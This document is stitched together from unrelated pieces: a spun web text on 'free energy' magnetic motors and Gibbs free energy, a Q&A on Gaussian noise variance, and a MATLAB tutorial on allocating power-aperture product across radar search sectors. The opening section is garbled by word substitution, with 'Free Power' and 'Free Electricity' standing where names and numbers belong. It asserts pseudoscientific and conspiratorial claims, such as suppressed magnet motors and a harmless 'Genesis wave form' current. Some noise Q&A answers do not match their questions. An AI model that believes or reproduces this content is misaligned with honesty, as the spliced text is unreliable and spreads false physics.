They are both wrong because democrats don’t do anything democratic but force laws to create other laws to destroy the USA for the UN and Free Energy World Order. There are thousands of magnetic motors. In fact all motors are magnetic weather from coils only or coils with magnets or magnets only. It is not positive for the magnet only motors at this time as those are being bought up by the power companies as soon as they show up. We use Free Power HZ in the USA but 50HZ in Europe is more efficient. Free Energy – How can you quibble endlessly on and on about whether Free Power “Magical Magnetic Motor” that does not exist produces AC or DC (just an opportunity to show off your limited knowledge)? FYI – The “Magical Magnetic Motor” produces neither AC nor DC, Free Electricity or Free Power cycles Free Power or Free energy volts! It produces current with Free Power Genesis wave form, Free Power voltage that adapts to any device, an amperage that adapts magically, and is perfectly harmless to the touch. The magnitude of G tells us that we don’t have quite as far to go to reach equilibrium. The points at which the straight line in the above figure cross the horizontal and versus axes of this diagram are particularly important. The straight line crosses the vertical axis when the reaction quotient for the system is equal to Free Power. This point therefore describes the standard-state conditions, and the value of G at this point is equal to the standard-state free energy of reaction, Go. The key to understanding the relationship between Go and K is recognizing that the magnitude of Go tells us how far the standard-state is from equilibrium. The smaller the value of Go, the closer the standard-state is to equilibrium. The larger the value of Go, the further the reaction has to go to reach equilibrium. The relationship between Go and the equilibrium constant for Free Power chemical reaction is illustrated by the data in the table below. As the tube is cooled, and the entropy term becomes less important, the net effect is Free Power shift in the equilibrium toward the right. The figure below shows what happens to the intensity of the brown color when Free Power sealed tube containing NO2 gas is immersed in liquid nitrogen. There is Free Power drastic decrease in the amount of NO2 in the tube as it is cooled to -196oC. Free energy is the idea that Free Power low-cost power source can be found that requires little to no input to generate Free Power significant amount of electricity. Such devices can be divided into two basic categories: “over-unity” devices that generate more energy than is provided in fuel to the device, and ambient energy devices that try to extract energy from Free Energy, such as quantum foam in the case of zero-point energy devices. Not all “free energy ” Free Energy are necessarily bunk, and not to be confused with Free Power. There certainly is cheap-ass energy to be had in Free Energy that may be harvested at either zero cost or sustain us for long amounts of time. Solar power is the most obvious form of this energy , providing light for life and heat for weather patterns and convection currents that can be harnessed through wind farms or hydroelectric turbines. In Free Electricity Nokia announced they expect to be able to gather up to Free Electricity milliwatts of power from ambient radio sources such as broadcast TV and cellular networks, enough to slowly recharge Free Power typical mobile phone in standby mode. 
[Free Electricity] This may be viewed not so much as free energy , but energy that someone else paid for. Similarly, cogeneration of electricity is widely used: the capturing of erstwhile wasted heat to generate electricity. It is important to note that as of today there are no scientifically accepted means of extracting energy from the Casimir effect which demonstrates force but not work. Most such devices are generally found to be unworkable. Of the latter type there are devices that depend on ambient radio waves or subtle geological movements which provide enough energy for extremely low-power applications such as RFID or passive surveillance. [Free Electricity] Free Power’s Demon — Free Power thought experiment raised by Free Energy Clerk Free Power in which Free Power Demon guards Free Power hole in Free Power diaphragm between two containers of gas. Whenever Free Power molecule passes through the hole, the Demon either allows it to pass or blocks the hole depending on its speed. It does so in such Free Power way that hot molecules accumulate on one side and cold molecules on the other. The Demon would decrease the entropy of the system while expending virtually no energy. This would only work if the Demon was not subject to the same laws as the rest of the universe or had Free Power lower temperature than either of the containers. Any real-world implementation of the Demon would be subject to thermal fluctuations, which would cause it to make errors (letting cold molecules to enter the hot container and Free Power versa) and prevent it from decreasing the entropy of the system. In chemistry, Free Power spontaneous processes is one that occurs without the addition of external energy. A spontaneous process may take place quickly or slowly, because spontaneity is not related to kinetics or reaction rate. A classic example is the process of carbon in the form of Free Power diamond turning into graphite, which can be written as the following reaction: Great! So all we have to do is measure the entropy change of the whole universe, right? Unfortunately, using the second law in the above form can be somewhat cumbersome in practice. After all, most of the time chemists are primarily interested in changes within our system, which might be Free Power chemical reaction in Free Power beaker. Free Power we really have to investigate the whole universe, too? (Not that chemists are lazy or anything, but how would we even do that?) When using Free Power free energy to determine the spontaneity of Free Power process, we are only concerned with changes in \text GG, rather than its absolute value. The change in Free Power free energy for Free Power process is thus written as \Delta \text GΔG, which is the difference between \text G_{\text{final}}Gfinal​, the Free Power free energy of the products, and \text{G}{\text{initial}}Ginitial​, the Free Power free energy of the reactants. But extra ordinary Free Energy shuch as free energy require at least some thread of evidence either in theory or Free Power working model that has hint that its possible. Models that rattle, shake and spark that someone hopes to improve with Free Power higher resolution 3D printer when they need to worry abouttolerances of Free Power to Free Electricity ten thousandths of an inch to get it run as smoothly shows they don’t understand Free Power motor. The entire discussion shows Free Power real lack of under standing. 
The lack of any discussion of the laws of thermodynamics to try to balance losses to entropy, heat, friction and resistance is another problem. Over the past couple of years, Collective Evolution has had the pleasure of communicating with Free Power Grotz (pictured in the video below), an electrical engineer who has researched new energy technologies since Free Electricity. He has worked in the aerospace industry, was involved with space shuttle and Hubble telescope testing in Free Power solar simulator and space environment test facility, and has been on both sides of the argument when it comes to exploring energy generation. He has been involved in exploring oil and gas and geothermal resources, as well as coal, natural gas, and nuclear power-plants. He is very passionate about new energy generation, and recognizes that the time to make the transition is now. I want to use Free Power 3D printer to create the stator and rotors. This should allow Free Power high quality build with lower cost. Free Energy adjustments can be made as well by re-printing parts with slightly different measurements, etc. I am with you Free Electricity on the no patents and no plans to make money with this. I want to free the world from this oppression. It’s funny that you would cling to some vague relation to great inventors as some proof that impossible bullshit is just Free Power matter of believing. The Free Power Free Power didn’t waste their time on alchemy or free energy. They sought to understand the physical forces around them. And it’s not like they persevered in the face of critics telling them they were chasing the impossible, any fool could observe Free Power bird flying to know it’s possible. You will never achieve anything even close to what they did because you are seeking to defy the reality of our world. You’ve got to understand before you can invent. The Free Power of God is the power, but the power of magnetism has kept this earth turning on its axis for untold ages. An increasing number of books and journal articles do not include the attachment “free”, referring to G as simply Free Power energy (and likewise for the Helmholtz energy). This is the result of Free Power Free Power IUPAC meeting to set unified terminologies for the international scientific community, in which the adjective ‘free’ was supposedly banished. [Free energy ] [Free Electricity] [Free Power] This standard, however, has not yet been universally adopted, and many published articles and books still include the descriptive ‘free’. Get free electricity here.
# What is variance of Gaussian noise?

## What is variance of Gaussian noise?

A Gaussian noise is a random variable N that has a normal distribution, denoted N ~ N(µ, σ²), where µ is the mean and σ² is the variance. If µ = 0 and σ² = 1, then the values that N takes are concentrated, with high probability, in the interval (−3.5, 3.5). Random-valued impulse noise, in contrast, is a pulse that can take on random values.

## What is the variance of Gaussian white noise?

For Gaussian noise, this implies that the filtered white noise can be represented by a sequence of independent, zero-mean Gaussian random variables with variance σ² = N₀W. Note that the variance of the samples and the rate at which they are taken are related by σ² = N₀fs/2.

## What is the relation of noise power with its variance?

A random variable's power equals its mean-squared value: the signal power thus equals E[S²]. Usually, the noise has zero mean, which makes its power equal to its variance. Thus, the SNR equals E[S²]/σ²_N.

## What is variance of white noise?

White noise has zero mean, constant variance, and is uncorrelated in time.

## What does Gaussian noise do?

Gaussian noise, named after Carl Friedrich Gauss, is statistical noise having a probability density function (PDF) equal to that of the normal distribution, which is also known as the Gaussian distribution. In other words, the values that the noise can take on are Gaussian-distributed.

## How is Gaussian noise generated?

When an electrical variation obeys a Gaussian distribution, such as in the case of the thermal motion cited above, it is called Gaussian noise, or random noise. Other examples occur with some types of radio tubes or semiconductors, where the noise may be amplified to produce a noise generator.

## Is white Gaussian noise stationary?

For example, a white noise process is stationary but may not be strictly stationary, whereas a Gaussian white noise is strictly stationary. Loosely speaking, if a series does not seem to have a constant mean or variance, then very likely it is not stationary.

## Is variance equal to power?

The variance does not depend on the mean value, but the power does. So if the mean value is not zero, the variance and the power are not equal.

## What is the variance of noise?

Essentially, noise variance is the noise energy per sample. The energy spectrum of the noise (the magnitude spectrum squared) describes how the energy density of the sequence is distributed with frequency. Noise energy integrated over time (samples) must equal the noise energy density integrated over frequency.

## What is Gaussian noise formula?

The thermal noise in electronic systems is usually modeled as a white Gaussian noise process. The random process X(t) is called a white Gaussian noise process if X(t) is a stationary Gaussian random process with zero mean, μX = 0, and flat power spectral density, SX(f) = N₀/2, for all f.

## How to calculate the variance of white Gaussian noise?

It could seem an easy question, and without any doubt it is, but I am trying to calculate the variance of white Gaussian noise without any result. The power spectral density (PSD) of additive white Gaussian noise (AWGN) is N₀/2, while the autocorrelation is (N₀/2)δ(τ), so is the variance infinite?

## What is an additive white Gaussian noise channel?

Additive white Gaussian noise (AWGN) is a basic noise model used in information theory to mimic the effect of many random processes that occur in nature.

## How is noise power of AWGN the same as noise variance?
As an example, assume a transmitter radiating 10 mW at a distance of 10 meters; as the distance increases, the power density is reduced by the square of the distance. So attenuation as high as 90 dB due to transmission loss can occur, and the signal level at the receiver can be as low as −80 dBm, which is only 34 dB above the noise.

## Can a white noise process be observed in nature?

Fortunately, we can never observe a white noise process (whether Gaussian or not) in nature; it is only observable through some kind of device, e.g. a (BIBO-stable) linear filter with some transfer function H(f), in which case what you get is a stationary Gaussian process with a power spectral density proportional to |H(f)|² and finite variance.
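A quick simulation illustrates the point above that, for zero-mean noise, average power and variance coincide. This is a minimal sketch with an arbitrarily chosen σ:

```
% Zero-mean Gaussian noise: average power (mean-squared value) ~ variance.
sigma = 2;
x = sigma*randn(1e6, 1);     % simulated white Gaussian noise samples
avgPower = mean(x.^2);       % average power
noiseVar = var(x, 1);        % population variance
disp([avgPower noiseVar])    % both are close to sigma^2 = 4
```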
# Quality-of-Service Optimization for Radar Resource Management This example shows how to set up a resource management scheme for a multifunction phased array radar (MPAR) surveillance based on a quality-of-service (QoS) optimization. It starts by defining parameters of multiple search sectors that must be surveyed simultaneously. It then introduces the cumulative detection range as a measure of search quality and shows how to define suitable utility functions for QoS optimization. Finally, the example shows how to use numeric optimization to allocate power-aperture product (PAP) to each search sector such that QoS is maximized. #### MPAR Resource Management Multifunction Phased Array Radar (MPAR) uses automated resource management to control individual elements of the antenna array [1]. This allows MPAR to partition the antenna array into a varying number of subarrays to create multiple transmit and receive beams. The number of beams, their positions, as well as the parameters of the transmitted waveforms can be controlled on the dwell-to-dwell basis. This allows MPAR to perform several functions such as surveillance, tracking, and communication simultaneously. Each such function can comprise one or multiple tasks that are managed by the radar resource manager (RRM). Based on the mission objectives and a current operational situation, the RRM allocates some amount of radar resources to each task. This example focuses on the resource management of the surveillance function. Since MPAR is performing multiple functions at the same time, only a fraction of the total radar resources (typically 50% under normal conditions [2]) are available for surveillance. This amount can be further reduced if the RRM has to reallocate resources from the surveillance to other functions. #### Search Sectors The surveillance volume of an MPAR is typically divided into several sectors. Each such sector has different range and angle limits and a different search frame time - the amount of time it takes to scan the sector once [2]. The RRM can treat surveillance of each such sector as a separate independent search task. Thus, the resources available to the surveillance function must be balanced between several search sectors. This example develops an RRM scheme for the MPAR with three search sectors: horizon, long-range, and high-elevation. The long-range sector has the largest volume and covers targets that approach the radar from a long distance, while the horizon and the high-elevation sectors are dedicated to the targets that can emerge close to the radar site. Set the horizon sector limits to -45 to 45 degrees in azimuth and 0 to 4 degrees in elevation, the long-range sector limits to -30 to 30 degrees in azimuth and 0 to 30 degrees in elevation, and the high-elevation sector limits to -45 to 45 degrees in azimuth and to 30 to 45 degrees in elevation. ```% Number of search sectors M = 3; % Sector names sectorNames = {'Horizon', 'Long-range', 'High-elevation'}; % Azimuth limits of the search sectors (deg) azimuthLimits = [-45 -30 -45; 45 30 45]; % Elevation limits of the search sectors (deg) elevationLimits = [0 0 30; 4 30 45];``` The range limit of the horizon sector is determined by the distance beyond which a target becomes hidden by the horizon. Given the height of the radar platform this distance can be computed using the `horizonrange` function. The range limit of the long-range sector is determined by the instrumented range of the radar - the range beyond which the detection probability approaches zero. 
Finally, the range limit of the high-elevation sector is determined by the maximum target altitude. Set the range limits of the horizon, the long-range, and the high-elevation sectors to 40 km, 70 km, and 50 km respectively. ```% Range limits (m) rangeLimits = [40e3 70e3 50e3];``` This example assumes that the MPAR performs surveillance of all three search sectors simultaneously. Since each sector has a different search volume, the search frame time,${t}_{f}$, is different for each sector. Additionally, each sector can have a different number of beam positions, ${N}_{b}$. Assuming the dwell time, ${T}_{d}$, (the time the beam spends in each beam position) is constant within a search sector, it is related to the search frame time as ${T}_{d}={t}_{f}/{N}_{b}$. Set the search frame time for the horizon sector to 0.5 seconds, for the long-range sector to 6 seconds, and for the high-elevation sector to 2 seconds. ```% Search frame time frameTime = [0.5 6 2];``` The search frame times are selected such that the closure range covered by an undetected target in one scan is significantly smaller than the target range. Consider a target with the radial velocity of 250 m/s that emerges at a sector's range limit. Compute the closure range for this target in each search sector. `frameTime*250` ```ans = 1×3 125 1500 500 ``` In one scan this target will get closer to the radar by 125 m if it is in the horizon sector. Since the horizon sector covers targets that can emerge very close to the radar site, it is important that this sector is searched frequently and that an undetected target does not get too close to the radar before the next attempted detection. On the other hand, the range limit of the long-range sector is 70 km and the corresponding target closure distance is 1.5 km. Hence, an undetected target in the long-range sector will be able to cover only a small fraction of the sector's range limit in a single scan. For convenience, organize the search sector parameters into an array of structs. ```searchSectorParams(M) = helperSearchSector(); for i = 1:M searchSectorParams(i).SectorName = sectorNames{i}; searchSectorParams(i).AzimuthLimits = azimuthLimits(:, i); searchSectorParams(i).ElevationLimits = elevationLimits(:, i); searchSectorParams(i).RangeLimit = rangeLimits(i); searchSectorParams(i).FrameTime = frameTime(i); end``` #### Quality-of-Service Resource Management Under normal operational conditions the surveillance function is typically allocated enough resources such that the required detection performance is achieved in each search sector. But in circumstances when the surveillance function must compete for the radar resources with other radar functions, the RRM might allocate only a fraction of the desired resources to each search sector. These resources can be allocated based on hard rules such as sector priorities. However, coming up with rules that provide optimal resource allocation under all operational conditions is very difficult. A more flexible approach is to assign a metric to each task to describe the quality of the performed function [3]. The performance requirements can be specified in terms of the task quality, and the RRM can adjust the task control parameters to achieve these requirements. This example assumes that resources are allocated to the search sectors in a form of PAP while the sectors' search frame times remain constant. It is convenient to treat PAP as a resource because it captures both the power and the aperture budget of the system. 
The presented resource allocation approach can be further extended to also include the search frame time to optimize the time budget of the system. Let ${q}_{i}\left(PA{P}_{i};{\theta }_{i}\right)$ be a quality metric that describes performance of a search task created for the $i$th sector. Here $PA{P}_{i}$ is the power aperture allocated by the RRM to the $i$th sector, and ${\theta }_{i}$ is the set of control and environmental parameters for the $i$th sector. To allocate the optimal amount of PAP to each search sector, the radar resource manager must solve the following optimization problem `$\underset{PAP}{\mathrm{max}}u\left(PAP\right)=\sum _{i=1}^{M}{w}_{i}\cdot {u}_{i}\left({q}_{i}\left(PA{P}_{i};{\theta }_{i}\right)\right)$` such that $\sum _{i=1}^{M}PA{P}_{i}\le PA{P}_{search}$ where $M$is the total number of search sectors; $PAP=\left[PA{P}_{1},PA{P}_{2},\dots ,PA{P}_{M}\right]$ is a vector that specifies the PAP allocation to each search sector; $PA{P}_{search}$ is the total amount of PAP available to the MPAR's surveillance function; ${u}_{i}$ is the utility function for $i$th search sector; and ${w}_{i}$ is the weight describing the priority of the $i$th search sector. Prior to weighting each sector with a priority weight, the QoS optimization problem first maps the quality of the $i$th search tasks to the utility space. Such mapping is necessary because different tasks can have very different desired quality levels or even use entirely different metrics to express the task quality. A utility function associates a degree of satisfaction with each quality level according to the mission objectives. Optimizing the sum of weighted utilities across all tasks aims to allocate resources such that the overall satisfaction with the surveillance function is maximized. The goal of a search task is to detect a target. As a target enters a search sector, it can be detected by the radar over multiple scans. With each scan the cumulative probability of detection grows as the target approaches the radar site. Therefore, a convenient metric that describes quality of a search task is the cumulative detection range ${R}_{c}$ - the range at which the cumulative probability of detection reaches a desired value of ${P}_{c}$ [4]. A commonly used ${P}_{c}$ is 0.9 and the corresponding cumulative detection range is denoted as ${R}_{90}$. #### Cumulative Probability of Detection Let ${R}_{m}$ be the range limit of a search sector beyond which the probability of detecting a target can be assumed to be equal to zero. The cumulative detection probability for a target that entered the search sector at ${R}_{m}$ is then a function of the target range $R$, the target radial speed ${v}_{r}$, and the sector frame time ${t}_{f}$ `${P}_{c}\left(R\right)={E}_{\Delta }\left\{1-\prod _{n=0}^{N}\left[1-{P}_{d}\left({R}_{m}-\Delta \cdot dR-n\cdot dR\right)\right]\right\}$` where ${P}_{d}\left(R\right)$ is the single-look probability of detection computed at range $R$; $N=⌊\left({R}_{m}-R\right)/{t}_{f}{v}_{r}⌋$ is the number of completed scans until the target reaches the range $R$ from ${R}_{m}$; $dR={t}_{f}{v}_{r}$ is the closure range (distance traveled by the target in a single scan); ${E}_{\Delta }$ is the expectation taken with respect to the uniformly distributed random variable $\Delta \sim U\left(0,1\right)$ that represents the possibility of the target entering the search volume at any time within a scan. 
Assuming a Swerling 1 case target and that all pulses within a dwell are coherently integrated, the single-look detection probability at range $R$ is

`${P}_{d}\left(R\right)={P}_{fa}^{\frac{1}{1+SN{R}_{m}{\left(\frac{{R}_{m}}{R}\right)}^{4}}}$`

where ${P}_{fa}$ is the probability of false alarm, and $SN{R}_{m}$ is the reference SNR measured at the sector's range limit ${R}_{m}$. It follows from the radar search equation that $SN{R}_{m}$ depends on the PAP allocated to the search sector.

`$SN{R}_{m}=PAP\cdot \frac{\sigma }{4\pi k{T}_{s}{R}_{m}^{4}L}\cdot \frac{{t}_{f}}{\Omega }$`

where $\Omega$ is the volume of the sector; ${T}_{s}$ is the system temperature; $L$ is the combined operational loss; $\sigma$ is the target radar cross section (RCS); and $k$ is the Boltzmann constant.

Use the `solidangle` function to compute the volume of a search sector and the `radareqsearchsnr` function to solve the radar search equation for $SN{R}_{m}$. Then use the `helperCumulativeDetectionProbability` function to compute the cumulative detection probability as a function of the target range given the found $SN{R}_{m}$.

First, assume that the system noise temperature is the same for each search sector and is equal to 913 K.

```
% System noise temperature (K)
Ts = [913 913 913];
```

Then, set the operational loss term for each sector.

```
% Operational loss (dB)
Loss = [22 19 24];
```

Accurate estimation of the operational loss term is critical to the use of the radar equation. It corrects for the assumption of an ideal system and an ideal environment. The operational loss includes contributions that account for environmental conditions, target positional uncertainty, scan loss, hardware degradation, and many other factors, typically totaling $\approx 20$ dB or more [1, 2]. For more information on the losses that must be included in the radar equation, refer to the Introduction to Pulse Integration and Fluctuation Loss in Radar, Introduction to Scanning and Processing Losses in Pulse Radar, and Modeling the Propagation of Radar Signals examples.

Set the radial speed of the target to 250 m/s and the target RCS to 1 m². This example assumes that the radar is searching for the same kind of target in all three search sectors. In practice, the radial velocity and the RCS of a typical target of interest can be different for each search sector.

```
% Target radial speed (m/s)
[searchSectorParams.TargetRadialSpeed] = deal(250);

% Target RCS (m²)
[searchSectorParams.TargetRCS] = deal(1);
```

Finally, set the false alarm probability to 1e-6.

```
% Probability of false alarm
[searchSectorParams.FalseAlarmProbability] = deal(1e-6);
```

Consider different values of the PAP allocated to each sector.

```
% Allocated PAP (W*m^2)
pap = [20 40 80];
```

Compute the cumulative probability of detection.
```
% Target range
R = 20e3:0.5e3:80e3;

% Search sector volume (sr)
sectorVolume = zeros(M, 1);

figure
tiledlayout(3, 1, 'TileSpacing', 'tight')

for i = 1:M
    % Volume of the search sector
    sectorVolume(i) = solidangle(searchSectorParams(i).AzimuthLimits, searchSectorParams(i).ElevationLimits);

    % Store loss and system noise temperature in the sector parameters
    % struct
    searchSectorParams(i).OperationalLoss = Loss(i);
    searchSectorParams(i).SystemNoiseTemperature = Ts(i);

    % SNR at the sector's range limit
    SNRm = radareqsearchsnr(searchSectorParams(i).RangeLimit, pap, sectorVolume(i), searchSectorParams(i).FrameTime, ...
        'RCS', searchSectorParams(i).TargetRCS, 'Ts', searchSectorParams(i).SystemNoiseTemperature, 'Loss', searchSectorParams(i).OperationalLoss);

    % Cumulative probability of detection
    Pc = helperCumulativeDetectionProbability(R, SNRm, searchSectorParams(i));

    % Plot
    ax = nexttile;
    colororder(flipud(ax.ColorOrder));
    hold on
    plot(R*1e-3, Pc, 'LineWidth', 2)
    xline(searchSectorParams(i).RangeLimit*1e-3, ':', 'LineWidth', 1.2, 'Color', 'k', 'Alpha', 1.0)
    yline(0.9, 'LineWidth', 1.2, 'Alpha', 1.0)
    ylabel('P_c')
    title(sprintf('%s Sector', searchSectorParams(i).SectorName))
    grid on
    xlim([20 80])
    ylim([-0.05 1.05])
end

xlabel('Target range (km)')
legendStr = {sprintf('PAP=%.0f (W·m²)', pap(1)), sprintf('PAP=%.0f (W·m²)', pap(2)), sprintf('PAP=%.0f (W·m²)', pap(3))};
legend([legendStr 'Range limit', 'P_c = 0.9'], 'Location', 'southoutside', 'Orientation', 'horizontal', 'NumColumns', 3)
```

Beyond the sector's range limit a target is undetectable and the cumulative detection probability is zero. Starting at the sector's range limit, as the target approaches the radar, the number of detection attempts increases with each scan. Thus, the cumulative detection probability increases as the target range decreases. By varying the PAP allocated to each sector, the radar can vary the ${R}_{90}$ range.

#### Cumulative Detection Range

The range ${R}_{90}$ at which the cumulative detection probability equals 0.9 can be found by numerically solving the equation ${P}_{c}\left(R\right)-0.9=0$ with respect to the range variable $R$. Compute ${R}_{90}$ in each sector as a function of the allocated PAP.

```
% The desired cumulative detection probability in the sector
[searchSectorParams.CumulativeDetectionProbability] = deal(0.9);

% Power-aperture product (W·m²)
PAP = 1:2:600;

% Range at which the cumulative detection probability is equal to the
% desired value
R90 = zeros(M, numel(PAP));

str1 = cell(1, M);
str2 = cell(1, M);

for i = 1:M
    for j = 1:numel(PAP)
        % SNR at the sector's range limit
        SNRm = radareqsearchsnr(searchSectorParams(i).RangeLimit, PAP(j), sectorVolume(i), searchSectorParams(i).FrameTime, ...
            'RCS', searchSectorParams(i).TargetRCS, 'Ts', searchSectorParams(i).SystemNoiseTemperature, 'Loss', searchSectorParams(i).OperationalLoss);

        % Cumulative detection probability at the range r
        % minus the required value of 0.9
        func = @(r)(helperCumulativeDetectionProbability(r, SNRm, searchSectorParams(i)) - searchSectorParams(i).CumulativeDetectionProbability);

        % Solve for range
        options = optimset('TolX', 0.0001);
        R90(i, j) = fzero(func, [1e-3 1] * searchSectorParams(i).RangeLimit, options);
    end

    str1{i} = sprintf('R_{90} (%s)', searchSectorParams(i).SectorName);
    str2{i} = sprintf('Range limit (%s)', searchSectorParams(i).SectorName);
end

% Plot
figure
hold on
hl = plot(PAP, R90*1e-3, 'LineWidth', 2);
hy = yline([searchSectorParams.RangeLimit]*1e-3, ':', 'LineWidth', 1.5, 'Alpha', 1.0);
[hy.Color] = deal(hl.Color);
xlabel('Power-aperture product (W·m²)')
ylabel('R_{90} (km)')
ylim([0 80])
legend([str1 str2], 'Location', 'southeast')
title('Search Task Quality vs. Resource')
grid on
```

This result shows, for each search sector, the dependence of the search task quality, ${R}_{90}$, on the allocated resource, the PAP. The RRM can allocate less or more PAP to a search sector to decrease or increase the effective value of ${R}_{90}$. However, as the allocated PAP increases, ${R}_{90}$ approaches the asymptotic value bounded by the sector's range limit.
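It can also be instructive to look at the marginal return directly. The short sketch below is an optional addition that reuses the `PAP` grid and `R90` values just computed; it approximates the slope $d{R}_{90}/dPAP$ for the horizon sector with finite differences, and the resulting curve flattens out as the allocation grows, which is the diminishing-returns behavior discussed next.

```
% Optional sketch: finite-difference estimate of the marginal return in the
% horizon sector, using the PAP grid and R90 values computed above.
marginalReturn = diff(R90(1, :))./diff(PAP);   % meters of R90 gained per W·m²

figure
plot(PAP(2:end), marginalReturn, 'LineWidth', 2)
xlabel('Power-aperture product (W·m²)')
ylabel('\Delta R_{90} / \Delta PAP (m per W·m²)')
title('Marginal Return in the Horizon Sector (illustrative)')
grid on
```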
If ${R}_{90}$ is already close to the sector's range limit, allocating more PAP to the sector will not provide any significant increase in the search task quality.

The QoS optimization problem seeks a resource allocation that jointly optimizes the search quality across all sectors. Since different search sectors can have different desired values of ${R}_{90}$, simply maximizing the sum of the cumulative detection ranges will not result in a fair resource allocation. In that case search sectors with a large ${R}_{90}$ will contribute significantly more to the objective function, dominating search sectors with a smaller ${R}_{90}$. To account for differences in the desired values of ${R}_{90}$ across the sectors, the QoS optimization problem first maps the quality metric to a utility. The utility describes the degree of satisfaction with how the search task is performing. The joint utility can be maximized by first weighting and then summing the utilities of the individual tasks. A simple utility function for a search task can be defined as follows [4]

`${u}_{i}\left({R}_{90}\right)=\begin{cases}0, & {R}_{90}<{R}_{{t}_{i}}\\ \dfrac{{R}_{90}-{R}_{{t}_{i}}}{{R}_{{o}_{i}}-{R}_{{t}_{i}}}, & {R}_{{t}_{i}}\le {R}_{90}\le {R}_{{o}_{i}}\\ 1, & {R}_{90}>{R}_{{o}_{i}}\end{cases}$`

where ${R}_{{t}_{i}}$ and ${R}_{{o}_{i}}$ are respectively the threshold and the objective value for ${R}_{90}$ in the sector $i$. The objective determines the desired detection performance for a search sector, while the threshold is a value of the cumulative detection range below which the search task performance is considered unsatisfactory. The intuition behind this utility function is that if the task's quality is above the objective, allocating more resources to this task is wasteful since it will not increase the overall system's satisfaction with the search performance. Similarly, if the quality is below the threshold the utility is zero, and the RRM should allocate resources to the task only when it has enough resources to make the utility positive. For example, with the horizon-sector values chosen below (${R}_{t}$ = 25 km and ${R}_{o}$ = 38 km), a cumulative detection range of 31.5 km maps to a utility of $(31.5-25)/(38-25)=0.5$. The sector's utility is always between 0 and 1 regardless of ${R}_{90}$, which makes it convenient to weight and add utilities across the sectors to obtain the joint utility for the surveillance function.

Define sets of ${R}_{90}$ objective and threshold values for each search sector.

```
% Objective range for each sector
Ro = [38e3 65e3 45e3];

% Threshold range for each sector
Rt = [25e3 45e3 30e3];
```

Create a utility function for each search sector using `helperUtilityFunction` and then plot it against the ${R}_{90}$ range.
```
% Ranges at which to evaluate the utility functions
r90 = 0:1e3:80e3;

figure
tiledlayout(3, 1, 'TileSpacing', 'tight')

for i = 1:M
    % Store threshold and objective values for cumulative detection range
    % in the sector parameters struct
    searchSectorParams(i).ThresholdDetectionRange = Rt(i);
    searchSectorParams(i).ObjectiveDetectionRange = Ro(i);

    % Evaluate and plot the utility at different ranges
    ax = nexttile;
    colors = ax.ColorOrder;
    hold on
    plot(r90*1e-3, helperUtilityFunction(r90, Rt(i), Ro(i)), 'LineWidth', 2, 'Color', colors(i, :))
    ht = xline(Rt(i)*1e-3, '-.', 'Color', 'k', 'LineWidth', 1.2, 'Alpha', 1.0);
    ho = xline(Ro(i)*1e-3, '--', 'Color', 'k', 'LineWidth', 1.2, 'Alpha', 1.0);
    ylabel('Utility')
    ylim([-0.05 1.05])
    title(sprintf('%s Sector', searchSectorParams(i).SectorName))
    grid on
end

xlabel('R_{90} (km)')
legend([ht ho], {'Threshold R_{90}', 'Objective R_{90}'}, 'Location', 'southoutside', 'Orientation', 'horizontal')
```

Using these utility functions, the PAP (the resource) can be mapped to the utility.

```
figure
hold on

for i = 1:M
    plot(PAP, helperUtilityFunction(R90(i, :), Rt(i), Ro(i)), 'LineWidth', 2)
end

xlabel('Power-aperture product (W·m²)')
ylabel('Utility')
ylim([-0.05 1.05])
title('Utility vs. Resource')
grid on
legend({searchSectorParams.SectorName}, 'Location', 'best')
```

The long-range and the high-elevation sectors require about 50 W·m² of PAP to have a non-zero utility. At the same time, the utility of the horizon sector is already maximized at about 74 W·m², and allocating more PAP to it will not improve the objective of the QoS optimization problem. Overall, the horizon and the high-elevation sectors require less PAP than the long-range sector to achieve the same utility.

#### Utility Under Normal Operational Conditions

Assume that under normal operational conditions the maximum utility is achieved in each search sector. In this case the RRM does not need to optimize the resource allocation. Each sector uses a nominal amount of resources, enough to satisfy the corresponding objective requirement for the cumulative detection range. Compute the PAP needed to achieve the maximum utility in each sector. First, find the SNR needed to achieve the cumulative probability of detection of 0.9 at the objective value of ${R}_{90}$. Then use the `radareqsearchpap` function to solve the power-aperture form of the radar search equation to find the corresponding values of the PAP for the sectors.

```
% Power-aperture product
maxUtilityPAP = zeros(1, M);

for i = 1:M
    % Cumulative detection probability at the range Ro minus the required
    % value
    func = @(snr)(helperCumulativeDetectionProbability(Ro(i), snr, searchSectorParams(i)) ...
        - searchSectorParams(i).CumulativeDetectionProbability);

    % Solve for SNR
    options = optimset('TolX', 0.0001);
    snr = fzero(func, [-20 30], options);

    % PAP needed to make R90 equal to the objective range Ro
    maxUtilityPAP(i) = radareqsearchpap(searchSectorParams(i).RangeLimit, snr, sectorVolume(i), searchSectorParams(i).FrameTime, ...
        'RCS', searchSectorParams(i).TargetRCS, 'Ts', searchSectorParams(i).SystemNoiseTemperature, 'Loss', searchSectorParams(i).OperationalLoss);
end

maxUtilityPAP
```

```
maxUtilityPAP = 1×3

   74.0963  421.6264  247.2635
```

The total amount of PAP used by the surveillance function under normal operational conditions is the sum of the maximum-utility PAP values used by each sector.
```
% Total PAP needed for search under the normal operational conditions
normalSearchPAP = ceil(sum(maxUtilityPAP))
```

```
normalSearchPAP = 743
```

Use the provided `helperDrawSearchSectors` helper function to visualize the radar search sectors. This function also plots the objective value of ${R}_{90}$ for each sector - the cumulative detection range corresponding to the maximum utility. Use a bar chart to plot the PAP allocated to the sectors.

```
figure
tiledlayout(1, 6, 'TileSpacing', 'loose')
ax1 = nexttile([1 5]);
helperDrawSearchSectors(ax1, searchSectorParams, true);
title('MPAR Search Sectors Under Normal Operational Conditions')

nexttile
bar(categorical("Normal conditions"), maxUtilityPAP, 'stacked')
set(gca(), 'YAxisLocation', 'right')
ylabel('Power-aperture product (W·m²)')
title('Resource Allocation')
grid on
```

#### Solution to QoS Optimization Problem

Under normal operational conditions all search tasks operate at the maximum utility, resulting in the cumulative detection range being equal to or exceeding the objective value in each search sector. Since the total amount of resources available to the MPAR is finite, activities of other radar functions such as tracking, maintenance, or communication, as well as system errors and failures, can impose new constraints on the amount of resources accessible to the surveillance function. These deviations from the normal operational conditions prompt the RRM to recompute the resource allocations to the search tasks such that the new constraints are met and the weighted utility is again maximized across all sectors. The QoS optimization problem can be solved numerically using the `fmincon` function from the Optimization Toolbox™.

Set the sector priority weights such that the horizon sector has the highest priority and the long-range sector has the lowest.

```
% Sector priority weights
w = [0.55 0.15 0.3];
```

Normalize the sector weights such that they add up to 1.

`w = w/sum(w);`

Assume that the surveillance function has access to only 50% of the PAP used for search under the normal operational conditions.

`searchPAP = 0.5*normalSearchPAP`
